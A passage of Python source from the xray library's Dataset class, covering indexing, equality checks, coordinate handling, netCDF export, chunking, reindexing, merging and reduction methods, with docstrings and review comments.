        and only when the key is a dict of the form {dim: labels}.
        """
        return _LocIndexer(self)

    def __getitem__(self, key):
        """Access variables or coordinates of this dataset as a
        :py:class:`~xray.DataArray`.

        Indexing with a list of names will return a new ``Dataset`` object.
        """
        from .dataarray import DataArray

        if utils.is_dict_like(key):
            return self.isel(**key)

        key = np.asarray(key)
        if key.ndim != 0:
            # a list/array of names selects a subset Dataset
            return self._copy_listed(key)
        return DataArray._new_from_dataset(self, key.item())

    def __setitem__(self, key, value):
        """Add an array to this dataset under ``key``.

        If value is a `DataArray`, call its `select_vars()` method, rename it
        to `key` and merge the contents of the resulting dataset into this
        dataset.

        If value is an `Variable` object (or tuple of form
        ``(dims, data[, attrs])``), add it to this dataset as a new
        variable.
        """
        if utils.is_dict_like(key):
            raise NotImplementedError('cannot yet use a dictionary as a key '
                                      'to set Dataset values')
        # delegate to update() so merge/conflict logic lives in one place
        self.update({key: value})

    def __delitem__(self, key):
        """Remove a variable from this dataset.

        If this variable is a dimension, all variables containing this
        dimension are also removed.
        """
        def remove(name):
            del self._variables[name]
            self._coord_names.discard(name)

        remove(key)

        if key in self._dims:
            del self._dims[key]
            # removing a dimension orphans every variable defined along it
            # (loop variable renamed so it no longer shadows the parameter)
            dependents = [name for name, var in iteritems(self._variables)
                          if key in var.dims]
            for name in dependents:
                remove(name)

    # mutable objects should not be hashable
    __hash__ = None

    def _all_compat(self, other, compat_str):
        """Helper function for equals and identical."""
        # some stores (e.g., scipy) do not seem to preserve order, so don't
        # require matching order for equality
        def compat(x, y):
            return getattr(x, compat_str)(y)

        return (self._coord_names == other._coord_names
                and utils.dict_equiv(self._variables, other._variables,
                                     compat=compat))

    def broadcast_equals(self, other):
        """Two Datasets are broadcast equal if they are equal after
        broadcasting all variables against each other.

        For example, variables that are scalar in one dataset but non-scalar in
        the other dataset can still be broadcast equal if the non-scalar
        variable is a constant.

        See Also
        --------
        Dataset.equals
        Dataset.identical
        """
        try:
            return self._all_compat(other, 'broadcast_equals')
        except (TypeError, AttributeError):
            # comparing against a non-Dataset object is simply "not equal"
            return False

    def equals(self, other):
        """Two Datasets are equal if they have matching variables and
        coordinates, all of which are equal.

        Datasets can still be equal (like pandas objects) if they have NaN
        values in the same locations.

        This method is necessary because `v1 == v2` for ``Dataset``
        does element-wise comparisons (like numpy.ndarrays).

        See Also
        --------
        Dataset.broadcast_equals
        Dataset.identical
        """
        try:
            return self._all_compat(other, 'equals')
        except (TypeError, AttributeError):
            # comparing against a non-Dataset object is simply "not equal"
            return False

    def identical(self, other):
        """Like equals, but also checks all dataset attributes and the
        attributes on all variables and coordinates.

        See Also
        --------
        Dataset.broadcast_equals
        Dataset.equals
        """
        try:
            if not utils.dict_equiv(self.attrs, other.attrs):
                return False
            return self._all_compat(other, 'identical')
        except (TypeError, AttributeError):
            # not a Dataset-like object
            return False

    @property
    def indexes(self):
        """OrderedDict of pandas.Index objects used for label based indexing.
        """
        # Lazily-built mapping view over this dataset; see the Indexes class.
        return Indexes(self)

    @property
    def coords(self):
        """Dictionary of xray.DataArray objects corresponding to coordinate
        variables.
        """
        # Mapping view backed by this dataset; see DatasetCoordinates.
        return DatasetCoordinates(self)

    @property
    def data_vars(self):
        """Dictionary of xray.DataArray objects corresponding to data
        variables (i.e., variables that are not coordinates).
        """
        return Variables(self)

    @property
    def vars(self):  # pragma: no cover
        """Deprecated alias for :py:attr:`data_vars`."""
        message = ('the Dataset property `vars` has been deprecated; '
                   'use `data_vars` instead')
        warnings.warn(message, FutureWarning, stacklevel=2)
        return self.data_vars

    def set_coords(self, names, inplace=False):
        """Given names of one or more variables, set them as coordinates

        Parameters
        ----------
        names : str or list of str
            Name(s) of variables in this dataset to convert into coordinates.
        inplace : bool, optional
            If True, modify this dataset inplace. Otherwise, create a new
            object.

        Returns
        -------
        Dataset
        """
        # TODO: allow inserting new coordinates with this method, like
        # DataFrame.set_index?
        # NB: membership is checked against self._variables rather than
        # self.data_vars so that the operation is idempotent.
        if isinstance(names, basestring):
            names = [names]
        self._assert_all_in_dataset(names)
        target = self if inplace else self.copy()
        target._coord_names.update(names)
        return target

    def reset_coords(self, names=None, drop=False, inplace=False):
        """Given names of coordinates, reset them to become variables

        Parameters
        ----------
        names : str or list of str, optional
            Name(s) of non-index coordinates in this dataset to reset into
            variables. By default, all non-index coordinates are reset.
        drop : bool, optional
            If True, remove coordinates instead of converting them into
            variables.
        inplace : bool, optional
            If True, modify this dataset inplace. Otherwise, create a new
            object.

        Returns
        -------
        Dataset
        """
        if names is None:
            # default: every coordinate that is not also a dimension (index)
            names = self._coord_names - set(self.dims)
        else:
            if isinstance(names, basestring):
                names = [names]
            self._assert_all_in_dataset(names)
            # index (dimension) coordinates cannot be reset, only dropped
            _assert_empty(
                set(names) & set(self.dims),
                'cannot remove index coordinates with reset_coords: %s')
        target = self if inplace else self.copy()
        target._coord_names.difference_update(names)
        if drop:
            for name in names:
                del target._variables[name]
        return target

    def dump_to_store(self, store, encoder=None, sync=True):
        """Store dataset contents to a backends.*DataStore object.

        Parameters
        ----------
        store : backends.*DataStore
            Target store; receives the encoded variables and attributes via
            its ``store`` method.
        encoder : callable, optional
            If given, applied as ``encoder(variables, attrs)`` after
            coordinate encoding and before writing.
        sync : bool, optional
            If True (default), call ``store.sync()`` after writing.
        """
        variables, attrs = conventions.encode_dataset_coordinates(self)
        if encoder:
            variables, attrs = encoder(variables, attrs)
        store.store(variables, attrs)
        if sync:
            store.sync()

    def to_netcdf(self, path=None, mode='w', format=None, group=None,
                  engine=None):
        """Write dataset contents to a netCDF file.

        Parameters
        ----------
        path : str, optional
            Path to which to save this dataset. If no path is provided, this
            function returns the resulting netCDF file as a bytes object; in
            this case, we need to use scipy.io.netcdf, which does not support
            netCDF version 4 (the default format becomes NETCDF3_64BIT).
        mode : {'w', 'a'}, optional
            Write ('w') or append ('a') mode. If mode='w', any existing file at
            this location will be overwritten.
        format : {'NETCDF4', 'NETCDF4_CLASSIC', 'NETCDF3_64BIT', 'NETCDF3_CLASSIC'}, optional
            File format for the resulting netCDF file:

            * NETCDF4: Data is stored in an HDF5 file, using netCDF4 API
              features.
            * NETCDF4_CLASSIC: Data is stored in an HDF5 file, using only
              netCDF 3 compatibile API features.
            * NETCDF3_64BIT: 64-bit offset version of the netCDF 3 file format,
              which fully supports 2+ GB files, but is only compatible with
              clients linked against netCDF version 3.6.0 or later.
            * NETCDF3_CLASSIC: The classic netCDF 3 file format. It does not
              handle 2+ GB files very well.

            All formats are supported by the netCDF4-python library.
            scipy.io.netcdf only supports the last two formats.

            The default format is NETCDF4 if you are saving a file to disk and
            have the netCDF4-python library available. Otherwise, xray falls
            back to using scipy to write netCDF files and defaults to the
            NETCDF3_64BIT format (scipy does not support netCDF4).
        group : str, optional
            Path to the netCDF4 group in the given file to open (only works for
            format='NETCDF4'). The group(s) will be created if necessary.
        engine : {'netcdf4', 'scipy', 'h5netcdf'}, optional
            Engine to use when writing netCDF files. If not provided, the
            default engine is chosen based on available dependencies, with a
            preference for 'netcdf4' if writing to a file on disk.
        """
        # imported locally, presumably to avoid a circular import with the
        # backends package -- TODO confirm
        from ..backends.api import to_netcdf
        return to_netcdf(self, path, mode, format, group, engine)

    # Deprecated aliases for to_netcdf. Each alias passes its own old name so
    # that the alias machinery reports the method the caller actually used;
    # previously `dump` was registered with the name 'dumps'.
    dump = utils.function_alias(to_netcdf, 'dump')
    dumps = utils.function_alias(to_netcdf, 'dumps')

    def __repr__(self):
        # Delegate to the shared formatting helpers for a readable summary.
        return formatting.dataset_repr(self)

    @property
    def chunks(self):
        """Block dimensions for this dataset's data or None if it's not a dask
        array.

        Raises ValueError if two variables disagree on the chunking of a
        shared dimension.
        """
        seen = {}
        for var in self.variables.values():
            if var.chunks is None:
                continue
            for dim, chunk in zip(var.dims, var.chunks):
                if dim in seen and seen[dim] != chunk:
                    raise ValueError('inconsistent chunks')
                seen[dim] = chunk
        return Frozen(SortedKeysDict(seen))

    def chunk(self, chunks=None, lock=False):
        """Coerce all arrays in this dataset into dask arrays with the given
        chunks.

        Non-dask arrays in this dataset will be converted to dask arrays. Dask
        arrays will be rechunked to the given chunk sizes.

        If no chunks are provided for one or more dimensions, chunk sizes
        along those dimensions will not be updated; non-dask arrays will be
        converted into dask arrays with a single block.

        Parameters
        ----------
        chunks : int or dict, optional
            Chunk sizes along each dimension, e.g., ``5`` or
            ``{'x': 5, 'y': 5}``.
        lock : optional
            Passed on to :py:func:`dask.array.from_array`, if the array is not
            already a dask array.

        Returns
        -------
        chunked : xray.Dataset
        """
        if isinstance(chunks, Number):
            # a single number applies to every dimension
            chunks = dict.fromkeys(self.dims, chunks)

        if chunks is not None:
            bad_dims = [d for d in chunks if d not in self.dims]
            if bad_dims:
                raise ValueError('some chunks keys are not dimensions on this '
                                 'object: %s' % bad_dims)

        def subset_chunks(mapping, dims):
            # restrict a chunks mapping to the given dimensions
            if mapping is None:
                return None
            return dict((d, mapping[d]) for d in dims if d in mapping)

        def chunk_variable(name, var):
            # empty mapping means "no chunking specified" for this variable
            var_chunks = subset_chunks(chunks, var.dims) or None
            if var.ndim == 0:
                # scalar variables cannot be chunked
                return var
            return var.chunk(var_chunks, name=name, lock=lock)

        variables = OrderedDict((k, chunk_variable(k, v))
                                for k, v in self.variables.items())
        return self._replace_vars_and_dims(variables)

    def isel(self, **indexers):
        """Returns a new dataset with each array indexed along the specified
        dimension(s).

        This method selects values from each array using its `__getitem__`
        method, except this method does not require knowing the order of
        each array's dimensions.

        Parameters
        ----------
        **indexers : {dim: indexer, ...}
            Keyword arguments with names matching dimensions and values given
            by integers, slice objects or arrays.

        Returns
        -------
        obj : Dataset
            A new Dataset with the same contents as this dataset, except each
            array and dimension is indexed by the appropriate indexers. In
            general, each array's data will be a view of the array's data
            in this dataset, unless numpy fancy indexing was triggered by using
            an array indexer, in which case the data will be a copy.

        See Also
        --------
        Dataset.sel
        DataArray.isel
        DataArray.sel
        """
        invalid = [k for k in indexers if k not in self.dims]
        if invalid:
            raise ValueError("dimensions %r do not exist" % invalid)

        def as_indexer(value):
            # ints and slices pass through; everything else becomes an ndarray
            if isinstance(value, (int, np.integer, slice)):
                return value
            return np.asarray(value)

        indexers = [(k, as_indexer(v)) for k, v in iteritems(indexers)]

        variables = OrderedDict()
        for name, var in iteritems(self._variables):
            applicable = dict((k, v) for k, v in indexers if k in var.dims)
            variables[name] = var.isel(**applicable)
        return self._replace_vars_and_dims(variables)

    def sel(self, method=None, **indexers):
        """Returns a new dataset with each array indexed by tick labels
        along the specified dimension(s).

        In contrast to `Dataset.isel`, indexers for this method should use
        labels instead of integers.

        Under the hood, this method is powered by using pandas's powerful
        Index objects. This makes label based indexing essentially just as
        fast as using integer indexing.

        It also means this method uses pandas's (well documented) logic for
        indexing. This means you can use string shortcuts for datetime indexes
        (e.g., '2000-01' to select all values in January 2000). It also means
        that slices are treated as inclusive of both the start and stop values,
        unlike normal Python indexing.

        Parameters
        ----------
        method : {None, 'nearest', 'pad'/'ffill', 'backfill'/'bfill'}, optional
            Method to use for inexact matches (requires pandas>=0.16):

            * default: only exact matches
            * pad / ffill: propagate last valid index value forward
            * backfill / bfill: propagate next valid index value backward
            * nearest: use nearest valid index value
        **indexers : {dim: indexer, ...}
            Keyword arguments with names matching dimensions and values given
            by scalars, slices or arrays of tick labels.

        Returns
        -------
        obj : Dataset
            A new Dataset with the same contents as this dataset, except each
            variable and dimension is indexed by the appropriate indexers. In
            general, each variable's data will be a view of the variable's data
            in this dataset, unless numpy fancy indexing was triggered by using
            an array indexer, in which case the data will be a copy.

        See Also
        --------
        Dataset.isel
        DataArray.isel
        DataArray.sel
        """
        # translate label-based indexers into positional ones, then defer to
        # isel for the actual indexing
        pos_indexers = indexing.remap_label_indexers(self, indexers,
                                                     method=method)
        return self.isel(**pos_indexers)

    def isel_points(self, dim='points', **indexers):
        """Returns a new dataset with each array indexed pointwise along the
        specified dimension(s).

        This method selects pointwise values from each array and is akin to
        the NumPy indexing behavior of `arr[[0, 1], [0, 1]]`, except this
        method does not require knowing the order of each array's dimensions.

        Parameters
        ----------
        dim : str or DataArray or pandas.Index or other list-like object, optional
            Name of the dimension to concatenate along. If dim is provided as a
            string, it must be a new dimension name, in which case it is added
            along axis=0. If dim is provided as a DataArray or Index or
            list-like object, its name, which must not be present in the
            dataset, is used as the dimension to concatenate along and the
            values are added as a coordinate.
        **indexers : {dim: indexer, ...}
            Keyword arguments with names matching dimensions and values given
            by array-like objects. All indexers must be the same length and
            1 dimensional.

        Returns
        -------
        obj : Dataset
            A new Dataset with the same contents as this dataset, except each
            array and dimension is indexed by the appropriate indexers. With
            pointwise indexing, the new Dataset will always be a copy of the
            original.

        See Also
        --------
        Dataset.sel
        DataArray.isel
        DataArray.sel
        DataArray.isel_points
        """
        indexer_dims = set(indexers)

        def relevant_keys(mapping):
            # names of entries that have at least one of the indexed dims
            return [k for k, v in mapping.items()
                    if any(d in indexer_dims for d in v.dims)]

        data_vars = relevant_keys(self.data_vars)
        coords = relevant_keys(self.coords)

        # all the indexers should be iterables
        # NB: capture the keys before ``indexers`` is rebound to a list below
        keys = indexers.keys()
        indexers = [(k, np.asarray(v)) for k, v in iteritems(indexers)]
        # Check that indexers are valid dims, integers, and 1D
        for k, v in indexers:
            if k not in self.dims:
                raise ValueError("dimension %s does not exist" % k)
            if v.dtype.kind != 'i':
                raise TypeError('Indexers must be integers')
            if v.ndim != 1:
                raise ValueError('Indexers must be 1 dimensional')

        # all the indexers should have the same length
        lengths = set(len(v) for k, v in indexers)
        if len(lengths) > 1:
            raise ValueError('All indexers must be the same length')

        # Existing dimensions are not valid choices for the dim argument
        # NOTE(review): the error messages below say 'sel_points' although
        # this method is isel_points -- confirm whether that is intentional
        # (shared wording with sel_points) before changing.
        if isinstance(dim, basestring):
            if dim in self.dims:
                # dim is an invalid string
                raise ValueError('Existing dimension names are not valid '
                                 'choices for the dim argument in sel_points')
        elif hasattr(dim, 'dims'):
            # dim is a DataArray or Coordinate
            if dim.name in self.dims:
                # dim already exists
                raise ValueError('Existing dimensions are not valid choices '
                                 'for the dim argument in sel_points')
        else:
            # try to cast dim to DataArray with name = points
            from .dataarray import DataArray
            dim = DataArray(dim, dims='points', name='points')

        # TODO: This would be sped up with vectorized indexing. This will
        # require dask to support pointwise indexing as well.
        # Select one point at a time with isel and concatenate the results
        # along the new dimension.
        return concat([self.isel(**d) for d in
                       [dict(zip(keys, inds)) for inds in
                        zip(*[v for k, v in indexers])]],
                      dim=dim, coords=coords, data_vars=data_vars)

    def reindex_like(self, other, method=None, copy=True):
        """Conform this object onto the indexes of another object, filling
        in missing values with NaN.

        Parameters
        ----------
        other : Dataset or DataArray
            Object with an 'indexes' attribute giving a mapping from dimension
            names to pandas.Index objects, which provides coordinates upon
            which to index the variables in this dataset. The indexes on this
            other object need not be the same as the indexes on this
            dataset. Any mis-matched index values will be filled in with
            NaN, and any mis-matched dimension names will simply be ignored.
        method : {None, 'nearest', 'pad'/'ffill', 'backfill'/'bfill'}, optional
            Method to use for filling index values from other not found in this
            dataset:

            * default: don't fill gaps
            * pad / ffill: propagate last valid index value forward
            * backfill / bfill: propagate next valid index value backward
            * nearest: use nearest valid index value (requires pandas>=0.16)
        copy : bool, optional
            If `copy=True`, the returned dataset contains only copied
            variables. If `copy=False` and no reindexing is required then
            original variables from this dataset are returned.

        Returns
        -------
        reindexed : Dataset
            Another dataset, with this dataset's data but coordinates from the
            other object.

        See Also
        --------
        Dataset.reindex
        align
        """
        # simply reindex against the other object's per-dimension indexes
        return self.reindex(method=method, copy=copy, **other.indexes)

    def reindex(self, indexers=None, method=None, copy=True, **kw_indexers):
        """Conform this object onto a new set of indexes, filling in
        missing values with NaN.

        Parameters
        ----------
        indexers : dict. optional
            Dictionary with keys given by dimension names and values given by
            arrays of coordinates tick labels. Any mis-matched coordinate values
            will be filled in with NaN, and any mis-matched dimension names will
            simply be ignored.
        method : {None, 'nearest', 'pad'/'ffill', 'backfill'/'bfill'}, optional
            Method to use for filling index values in ``indexers`` not found in
            this dataset:

            * default: don't fill gaps
            * pad / ffill: propagate last valid index value forward
            * backfill / bfill: propagate next valid index value backward
            * nearest: use nearest valid index value (requires pandas>=0.16)
        copy : bool, optional
            If `copy=True`, the returned dataset contains only copied
            variables. If `copy=False` and no reindexing is required then
            original variables from this dataset are returned.
        **kw_indexers : optional
            Keyword arguments in the same form as ``indexers``.

        Returns
        -------
        reindexed : Dataset
            Another dataset, with this dataset's data but replaced coordinates.

        See Also
        --------
        Dataset.reindex_like
        align
        pandas.Index.get_indexer
        """
        # merge the positional and keyword forms of indexers
        indexers = utils.combine_pos_and_kw_args(indexers, kw_indexers,
                                                 'reindex')
        if not indexers:
            # shortcut: nothing to reindex against
            return self.copy(deep=True) if copy else self

        variables = alignment.reindex_variables(
            self.variables, self.indexes, indexers, method, copy=copy)
        return self._replace_vars_and_dims(variables)

    def rename(self, name_dict, inplace=False):
        """Returns a new object with renamed variables and dimensions.

        Parameters
        ----------
        name_dict : dict-like
            Dictionary whose keys are current variable or dimension names and
            whose values are new names.
        inplace : bool, optional
            If True, rename variables and dimensions in-place. Otherwise,
            return a new dataset object.

        Returns
        -------
        renamed : Dataset
            Dataset with renamed variables and dimensions.

        See Also
        --------

        Dataset.swap_dims
        DataArray.rename
        """
        for k in name_dict:
            if k not in self:
                raise ValueError("cannot rename %r because it is not a "
                                 "variable in this dataset" % k)

        variables = OrderedDict()
        coord_names = set()
        for old_name, var in iteritems(self._variables):
            new_name = name_dict.get(old_name, old_name)
            # shallow-copy the variable so we can rewrite its dims safely
            renamed = var.copy(deep=False)
            renamed.dims = tuple(name_dict.get(d, d) for d in var.dims)
            variables[new_name] = renamed
            if old_name in self._coord_names:
                coord_names.add(new_name)

        return self._replace_vars_and_dims(variables, coord_names,
                                           inplace=inplace)

    def swap_dims(self, dims_dict, inplace=False):
        """Returns a new object with swapped dimensions.

        Parameters
        ----------
        dims_dict : dict-like
            Dictionary whose keys are current dimension names and whose values
            are new names. Each value must already be a variable in the
            dataset.
        inplace : bool, optional
            If True, swap dimensions in-place. Otherwise, return a new dataset
            object.

        Returns
        -------
        renamed : Dataset
            Dataset with swapped dimensions.

        See Also
        --------

        Dataset.rename
        DataArray.swap_dims
        """
        # validate: every key must be an existing dim, every value a 1D
        # variable along that dim
        for old_dim, new_dim in dims_dict.items():
            if old_dim not in self.dims:
                raise ValueError('cannot swap from dimension %r because it is '
                                 'not an existing dimension' % old_dim)
            if self.variables[new_dim].dims != (old_dim,):
                raise ValueError('replacement dimension %r is not a 1D '
                                 'variable along the old dimension %r'
                                 % (new_dim, old_dim))

        result_dims = set(dims_dict.get(d, d) for d in self.dims)

        coord_names = self._coord_names.copy()
        coord_names.update(dims_dict.values())

        variables = OrderedDict()
        for name, var in iteritems(self.variables):
            # new dimension names become coordinates; everything else stays a
            # plain variable
            swapped = var.to_coord() if name in result_dims else var.to_variable()
            swapped.dims = tuple(dims_dict.get(d, d) for d in var.dims)
            variables[name] = swapped

        return self._replace_vars_and_dims(variables, coord_names,
                                           inplace=inplace)

    def update(self, other, inplace=True):
        """Update this dataset's variables with those from another dataset.

        Parameters
        ----------
        other : Dataset or castable to Dataset
            Dataset or variables with which to update this dataset.
        inplace : bool, optional
            If True, merge the other dataset into this dataset in-place.
            Otherwise, return a new dataset object.

        Returns
        -------
        updated : Dataset
            Updated dataset.

        Raises
        ------
        ValueError
            If any dimensions would have inconsistent sizes in the updated
            dataset.
        """
        # implemented as a left-join merge that overwrites every variable
        # present in ``other``
        overwrite = list(other)
        return self.merge(other, inplace=inplace, overwrite_vars=overwrite,
                          join='left')

    def merge(self, other, inplace=False, overwrite_vars=frozenset(),
              compat='broadcast_equals', join='outer'):
        """Merge the arrays of two datasets into a single dataset.

        This method generally does not allow for overriding data, with the
        exception of attributes, which are ignored on the second dataset.
        Variables with the same name are checked for conflicts via the equals
        or identical methods.

        Parameters
        ----------
        other : Dataset or castable to Dataset
            Dataset or variables to merge with this dataset.
        inplace : bool, optional
            If True, merge the other dataset into this dataset in-place.
            Otherwise, return a new dataset object.
        overwrite_vars : str or sequence, optional
            If provided, update variables of these name(s) without checking for
            conflicts in this dataset.
        compat : {'broadcast_equals', 'equals', 'identical'}, optional
            String indicating how to compare variables of the same name for
            potential conflicts:

            - 'broadcast_equals': all values must be equal when variables are
              broadcast against each other to ensure common dimensions.
            - 'equals': all values and dimensions must be the same.
            - 'identical': all values, dimensions and attributes must be the
              same.
        join : {'outer', 'inner', 'left', 'right'}, optional
            Method for joining ``self`` and ``other`` along shared dimensions:

            - 'outer': use the union of the indexes
            - 'inner': use the intersection of the indexes
            - 'left': use indexes from ``self``
            - 'right': use indexes from ``other``

        Returns
        -------
        merged : Dataset
            Merged dataset.

        Raises
        ------
        ValueError
            If any variables conflict (see ``compat``).
        """
        if compat not in ['broadcast_equals', 'equals', 'identical']:
            raise ValueError("compat=%r invalid: must be 'broadcast_equals', "
                             "'equals' or 'identical'" % compat)

        # normalize overwrite_vars to a set (the frozenset default avoids the
        # mutable-default-argument pitfall and is never mutated)
        if isinstance(overwrite_vars, basestring):
            overwrite_vars = [overwrite_vars]
        overwrite_vars = set(overwrite_vars)

        merge = _merge_dataset if isinstance(other, Dataset) else _merge_dict

        replace_vars, new_vars, new_coord_names = merge(
            self, other, overwrite_vars, compat=compat, join=join)

        # a variable that is a coordinate on one dataset but a data variable
        # on the other is ambiguous unless it is explicitly overwritten
        newly_coords = new_coord_names & (set(self) - set(self.coords))
        no_longer_coords = set(self.coords) & (set(new_vars) - new_coord_names)
        ambiguous_coords = (newly_coords | no_longer_coords) - overwrite_vars
        if ambiguous_coords:
            raise ValueError('cannot merge: the following variables are '
                             'coordinates on one dataset but not the other: %s'
                             % list(ambiguous_coords))

        obj = self if inplace else self.copy()
        obj._update_vars_and_coords(replace_vars, new_coord_names)
        return obj

    def _assert_all_in_dataset(self, names, virtual_okay=False):
        """Raise ValueError unless every name in ``names`` is a variable in
        this dataset (or a virtual variable, when ``virtual_okay`` is True).
        """
        bad_names = set(names) - set(self._variables)
        if virtual_okay:
            bad_names -= self.virtual_variables
        if bad_names:
            # name the offending variables so the error is actionable
            raise ValueError('One or more of the specified variables '
                             'cannot be found in this dataset: %s'
                             % list(bad_names))

    def drop(self, labels, dim=None):
        """Drop variables or index labels from this dataset.

        If a variable corresponding to a dimension is dropped, all variables
        that use that dimension are also dropped.

        Parameters
        ----------
        labels : str
            Names of variables or index labels to drop.
        dim : None or str, optional
            Dimension along which to drop index labels. By default (if
            ``dim is None``), drops variables rather than index labels.

        Returns
        -------
        dropped : Dataset
        """
        if utils.is_scalar(labels):
            labels = [labels]
        if dim is not None:
            # drop index labels: reindex onto the remaining labels
            remaining = self.indexes[dim].drop(labels)
            return self.loc[{dim: remaining}]
        return self._drop_vars(labels)

    def _drop_vars(self, names):
        """Drop the named variables, plus any variable that uses one of the
        dropped names as a dimension."""
        self._assert_all_in_dataset(names)
        to_drop = set(names)
        for k, v in iteritems(self._variables):
            if any(name in v.dims for name in names):
                to_drop.add(k)
        variables = OrderedDict((k, v) for k, v in iteritems(self._variables)
                                if k not in to_drop)
        coord_names = set(k for k in self._coord_names if k in variables)
        return self._replace_vars_and_dims(variables, coord_names)

    def drop_vars(self, *names):  # pragma: no cover
        """Deprecated alias for :py:meth:`drop`."""
        message = ('the Dataset method `drop_vars` has been deprecated; '
                   'use `drop` instead')
        warnings.warn(message, FutureWarning, stacklevel=2)
        return self.drop(names)

    def transpose(self, *dims):
        """Return a new Dataset object with all array dimensions transposed.

        Although the order of dimensions on each array will change, the dataset
        dimensions themselves will remain in fixed (sorted) order.

        Parameters
        ----------
        *dims : str, optional
            By default, reverse the dimensions on each array. Otherwise,
            reorder the dimensions to this order.

        Returns
        -------
        transposed : Dataset
            Each array in the dataset (including) coordinates will be
            transposed to the given order.

        Notes
        -----
        Although this operation returns a view of each array's data, it
        is not lazy -- the data will be fully loaded into memory.

        See Also
        --------
        numpy.transpose
        DataArray.transpose
        """
        # dims, when given, must be exactly a permutation of the dataset dims
        if dims and set(dims) ^ set(self.dims):
            raise ValueError('arguments to transpose (%s) must be '
                             'permuted dataset dimensions (%s)'
                             % (dims, tuple(self.dims)))
        result = self.copy()
        for name, var in iteritems(self._variables):
            # keep only the dims this variable actually has, in the new order
            var_dims = tuple(d for d in dims if d in var.dims)
            result._variables[name] = var.transpose(*var_dims)
        return result

    @property
    def T(self):
        """Shorthand for :py:meth:`transpose` with no arguments (reverses the
        dimensions on each array)."""
        return self.transpose()

    def squeeze(self, dim=None):
        """Returns a new dataset with squeezed data.

        Parameters
        ----------
        dim : None or str or tuple of str, optional
            Selects a subset of the length one dimensions. If a dimension is
            selected with length greater than one, an error is raised.  If
            None, all length one dimensions are squeezed.

        Returns
        -------
        squeezed : Dataset
            This dataset, but with all or a subset of the dimensions of
            length 1 removed.

        Notes
        -----
        Although this operation returns a view of each variable's data, it is
        not lazy -- all variable data will be fully loaded.

        See Also
        --------
        numpy.squeeze
        """
        # delegates to the shared squeeze implementation in common
        return common.squeeze(self, self.dims, dim)

    def dropna(self, dim, how='any', thresh=None, subset=None):
        """Returns a new dataset with dropped labels for missing values along
        the provided dimension.

        Parameters
        ----------
        dim : str
            Dimension along which to drop missing values. Dropping along
            multiple dimensions simultaneously is not yet supported.
        how : {'any', 'all'}, optional
            * any : if any NA values are present, drop that label
            * all : if all values are NA, drop that label
        thresh : int, default None
            If supplied, require this many non-NA values.
        subset : sequence, optional
            Subset of variables to check for missing values. By default, all
            variables in the dataset are checked.

        Returns
        -------
        Dataset
        """
        # TODO: consider supporting multiple dimensions? Or not, given that
        # there are some ugly edge cases, e.g., pandas's dropna differs
        # depending on the order of the supplied axes.

        if dim not in self.dims:
            raise ValueError('%s must be a single dataset dimension' % dim)

        if subset is None:
            subset = list(self.data_vars)

        # count non-NA values per label along ``dim``, summed over the
        # checked variables; ``size`` is the total possible count
        count = np.zeros(self.dims[dim], dtype=np.int64)
        size = 0
        for name in subset:
            array = self._variables[name]
            if dim not in array.dims:
                continue
            other_dims = [d for d in array.dims if d != dim]
            count += array.count(other_dims)
            size += np.prod([self.dims[d] for d in other_dims])

        # a given ``thresh`` takes precedence over ``how``
        if thresh is not None:
            mask = count >= thresh
        elif how == 'any':
            mask = count == size
        elif how == 'all':
            mask = count > 0
        elif how is not None:
            raise ValueError('invalid how option: %s' % how)
        else:
            raise TypeError('must specify how or thresh')

        return self.isel(**{dim: mask})

    def fillna(self, value):
        """Fill missing values in this object.

        This operation follows the normal broadcasting and alignment rules that
        xray uses for binary arithmetic, except the result is aligned to this
        object (``join='left'``) instead of aligned to the intersection of
        index coordinates (``join='inner'``).

        Parameters
        ----------
        value : scalar, ndarray, DataArray, dict or Dataset
            Used to fill all matching missing values in this dataset's data
            variables. Scalars, ndarrays or DataArrays arguments are used to
            fill all data with aligned coordinates (for DataArrays).
            Dictionaries or datasets match data variables and then align
            coordinates if necessary.

        Returns
        -------
        Dataset
        """
        # Delegate to _fillna -- presumably one of the operators installed by
        # ops.inject_all_ops_and_reduce_methods at module bottom; confirm there.
        return self._fillna(value)

    def reduce(self, func, dim=None, keep_attrs=False, numeric_only=False,
               allow_lazy=False, **kwargs):
        """Reduce this dataset by applying `func` along some dimension(s).

        Parameters
        ----------
        func : function
            Function which can be called in the form
            `f(x, axis=axis, **kwargs)` to return the result of reducing an
            np.ndarray over an integer valued axis.
        dim : str or sequence of str, optional
            Dimension(s) over which to apply `func`.  By default `func` is
            applied over all dimensions.
        keep_attrs : bool, optional
            If True, the datasets's attributes (`attrs`) will be copied from
            the original object to the new one.  If False (default), the new
            object will be returned without attributes.
        numeric_only : bool, optional
            If True, only apply ``func`` to variables with a numeric dtype.
        allow_lazy : bool, optional
            Passed through to each variable's ``reduce`` method.
        **kwargs : dict
            Additional keyword arguments passed on to ``func``.

        Returns
        -------
        reduced : Dataset
            Dataset with this object's DataArrays replaced with new DataArrays
            of summarized data and the indicated dimension(s) removed.
        """
        # Normalize `dim` into a set of dimension names.
        # NOTE(review): `basestring` ties this to Python 2 or a compat shim.
        if isinstance(dim, basestring):
            dims = set([dim])
        elif dim is None:
            dims = set(self.dims)
        else:
            dims = set(dim)

        _assert_empty([dim for dim in dims if dim not in self.dims],
                      'Dataset does not contain the dimensions: %s')

        variables = OrderedDict()
        for name, var in iteritems(self._variables):
            reduce_dims = [dim for dim in var.dims if dim in dims]
            if reduce_dims or not var.dims:
                # Variable touches the reduction dims (or is 0-d): reduce it.
                # Coordinates and (with numeric_only) non-numeric variables
                # are silently dropped from the result here.
                if name not in self.coords:
                    if (not numeric_only
                            or np.issubdtype(var.dtype, np.number)
                            or var.dtype == np.bool_):
                        if len(reduce_dims) == 1:
                            # unpack dimensions for the benefit of functions
                            # like np.argmin which can't handle tuple arguments
                            reduce_dims, = reduce_dims
                        elif len(reduce_dims) == var.ndim:
                            # prefer to aggregate over axis=None rather than
                            # axis=(0, 1) if they will be equivalent, because
                            # the former is often more efficient
                            reduce_dims = None
                        variables[name] = var.reduce(func, dim=reduce_dims,
                                                     keep_attrs=keep_attrs,
                                                     allow_lazy=allow_lazy,
                                                     **kwargs)
            else:
                # Variable does not touch any reduction dim: keep it unchanged.
                variables[name] = var

        coord_names = set(k for k in self.coords if k in variables)
        attrs = self.attrs if keep_attrs else None
        return self._replace_vars_and_dims(variables, coord_names, attrs)

    def apply(self, func, keep_attrs=False, args=(), **kwargs):
        """Apply ``func`` to every data variable and build a new dataset from
        the results.

        Parameters
        ----------
        func : function
            Called in the form `f(x, **kwargs)` on each DataArray `x` in this
            dataset; must return another DataArray.
        keep_attrs : bool, optional
